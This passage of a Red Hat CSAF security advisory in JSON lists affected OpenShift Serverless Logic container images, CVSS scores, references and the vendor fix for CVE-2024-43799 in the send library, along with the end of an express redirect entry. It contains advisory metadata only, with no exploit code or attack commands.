"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "express: Improper Input Handling in Express Redirects"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-14T00:59:58+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
